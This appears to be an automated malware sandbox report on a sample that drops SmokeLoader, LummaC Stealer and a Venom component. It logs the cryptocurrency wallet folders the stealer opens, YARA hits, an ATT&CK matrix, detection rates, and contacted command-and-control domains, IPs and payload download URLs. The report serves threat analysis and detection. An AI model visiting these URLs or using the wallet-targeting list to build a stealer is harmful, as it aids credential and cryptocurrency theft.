Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ONBQCLYSPU
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB

Source: Yara match	File source: 0000000D.00000003.2644907653.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2613784729.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2832025974.0000000000613000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2645696277.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2666588683.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2632557485.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2666017373.0000000003011000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2830110398.0000000000610000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2613300795.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2644409478.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2631526881.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2644907653.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2612260038.000000000300D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2645696277.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2666377646.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 4936, type: MEMORYSTR

Remote Access Functionality

Yara detected Go Injector

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 8.2.34CA.exe.7ff65b6b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.34CA.exe.7ff65b6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000000.2466826859.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2601744896.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 34CA.exe PID: 6796, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\34CA.exe, type: DROPPED

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BitLockerToGo.exe PID: 3588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lm.exe PID: 4936, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Code function: 18_2_6CA79E10 bind,listen,WSAGetLastError,closesocket,

18_2_6CA79E10

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	112 Scripting	Valid Accounts	331 Windows Management Instrumentation	112 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	121 Native API	1 DLL Side-Loading	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	1 Input Capture	11 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	2 Scheduled Task/Job	812 Process Injection	241 Obfuscated Files or Information	Security Account Manager	237 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 Command and Scripting Interpreter	121 Registry Run Keys / Startup Folder	2 Scheduled Task/Job	22 Software Packing	NTDS	1081 Security Software Discovery	Distributed Component Object Model	1 Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 Scheduled Task/Job	Network Logon Script	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	471 Virtualization/Sandbox Evasion	SSH	2 Clipboard Data	4 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	4 PowerShell	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	3 Process Discovery	VNC	GUI Input Capture	125 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	471 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	812 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Hidden Files and Directories	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FpiUD4nYpj.exe	43%	Virustotal		Browse
FpiUD4nYpj.exe	100%	Avira	HEUR/AGEN.1312596
FpiUD4nYpj.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\jjistfr	100%	Avira	HEUR/AGEN.1312596
C:\Users\user\AppData\Local\Temp\2FBE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\jjistfr	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2FBE.exe	71%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\34CA.exe	50%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\BD9E.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll	42%	ReversingLabs	Win32.Adware.RedCap
C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll	42%	ReversingLabs	Win32.Adware.RedCap
C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
funrecipebooks.com	1%	Virustotal	Browse
store4.gofile.io	0%	Virustotal	Browse
rentry.co	1%	Virustotal	Browse
mzxn.ru	2%	Virustotal	Browse
liernessfornicsa.shop	19%	Virustotal	Browse
callosallsaospz.shop	19%	Virustotal	Browse
mussangroup.com	14%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://aka.ms/odirmr	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://ocsps.ssl.com0?	0%	URL Reputation	safe
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	0%	URL Reputation	safe
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	0%	URL Reputation	safe
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	0%	URL Reputation	safe
https://aka.ms/winsvr-2022-pshelp	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	0%	URL Reputation	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	0%	URL Reputation	safe
https://www.rd.com/list/polite-habits-campers-dislike/	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/-	0%	Avira URL Cloud	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://liernessfornicsa.shop/apitg	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
http://100xmargin.com/tmp/index.php	0%	Avira URL Cloud	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	0%	URL Reputation	safe
http://olinsw.ws/tmp/index.php	0%	Avira URL Cloud	safe
http://100xmargin.com/tmp/index.php	0%	Virustotal		Browse
https://liernessfornicsa.shop/0	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	0%	Avira URL Cloud	safe
http://mzxn.ru/tmp/index.php	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/0	16%	Virustotal		Browse
https://callosallsaospz.shop/api3QFjF/HP	100%	Avira URL Cloud	malware
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	0%	Virustotal		Browse
https://callosallsaospz.shop/apiD	100%	Avira URL Cloud	malware
http://mzxn.ru/tmp/index.php	2%	Virustotal		Browse
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	0%	Avira URL Cloud	safe
callosallsaospz.shop	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://olinsw.ws/tmp/index.php	0%	Virustotal		Browse
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
callosallsaospz.shop	19%	Virustotal		Browse
http://ocsps.ssl.com0_	0%	Avira URL Cloud	safe
liernessfornicsa.shop	0%	Avira URL Cloud	safe
https://rentry.co	0%	Avira URL Cloud	safe
http://www.oberhumer.com	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://www.oberhumer.com	0%	Virustotal		Browse
https://rentry.co	1%	Virustotal		Browse
https://wns.windows.com/L	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
https://liernessfornicsa.shop/q	0%	Avira URL Cloud	safe
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	0%	Virustotal		Browse
https://wns.windows.com/L	0%	Virustotal		Browse
liernessfornicsa.shop	19%	Virustotal		Browse
https://store4.gofile.io	0%	Avira URL Cloud	safe
https://107.173.160.139/	0%	Avira URL Cloud	safe
http://crl.mic	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://liernessfornicsa.shop/q	14%	Virustotal		Browse
https://liernessfornicsa.shop/apii	0%	Avira URL Cloud	safe
shepherdlyopzc.shop	0%	Avira URL Cloud	safe
https://store4.gofile.io	0%	Virustotal		Browse
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
https://107.173.160.139/	3%	Virustotal		Browse
http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
funrecipebooks.com	162.0.235.84	true	true	1%, Virustotal, Browse	unknown
store4.gofile.io	31.14.70.245	true	false	0%, Virustotal, Browse	unknown
rentry.co	104.26.2.16	true	true	1%, Virustotal, Browse	unknown
mzxn.ru	211.40.39.251	true	true	2%, Virustotal, Browse	unknown
liernessfornicsa.shop	172.67.213.85	true	true	19%, Virustotal, Browse	unknown
mussangroup.com	185.149.100.242	true	true	14%, Virustotal, Browse	unknown
callosallsaospz.shop	188.114.97.3	true	true	19%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://100xmargin.com/tmp/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://olinsw.ws/tmp/index.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://mzxn.ru/tmp/index.php	true	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
callosallsaospz.shop	true	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
liernessfornicsa.shop	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://107.173.160.139/	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
shepherdlyopzc.shop	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
upknittsoappz.shop	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mussangroup.com/wp-content/images/pic1.jpg	true	6%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip	false	Avira URL Cloud: safe	unknown
unseaffarignsk.shop	true	Avira URL Cloud: safe	unknown
https://callosallsaospz.shop/api	false	Avira URL Cloud: malware	unknown
http://wgdnb4rc.xyz/tmp/index.php	true	Avira URL Cloud: safe	unknown
https://107.173.160.137/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1712692265.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BitLockerToGo.exe, 0000000D.00000003.2617996462.0000000004F58000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751124062.000000000314E000.00000004.00000800.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2751579321.0000000003358000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/-	lm.exe, 00000013.00000002.3175149094.0000000003100000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://liernessfornicsa.shop/apitg	lm.exe, 00000013.00000002.3175149094.0000000003113000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://liernessfornicsa.shop/0	lm.exe, 00000013.00000003.2736909869.0000000000611000.00000004.00000020.00020000.00000000.sdmp, lm.exe, 00000013.00000003.2736615115.0000000000610000.00000004.00000020.00020000.00000000.sdmp	true	16%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714271220.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsps.ssl.com0?	BD9E.exe.1.dr	false	URL Reputation: safe	unknown
http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0	BD9E.exe.1.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	BitLockerToGo.exe, 0000000D.00000003.2647522182.0000000003030000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0	BD9E.exe.1.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1716518107.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://callosallsaospz.shop/api3QFjF/HP	BitLockerToGo.exe, 0000000D.00000003.2631526881.000000000300D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://callosallsaospz.shop/apiD	BitLockerToGo.exe, 0000000D.00000002.2709297632.000000000300D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 0000000D.00000003.2706400829.000000000300D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1712692265.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	BD9E.exe, 0000000A.00000002.2899650889.000001DCE7AA2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
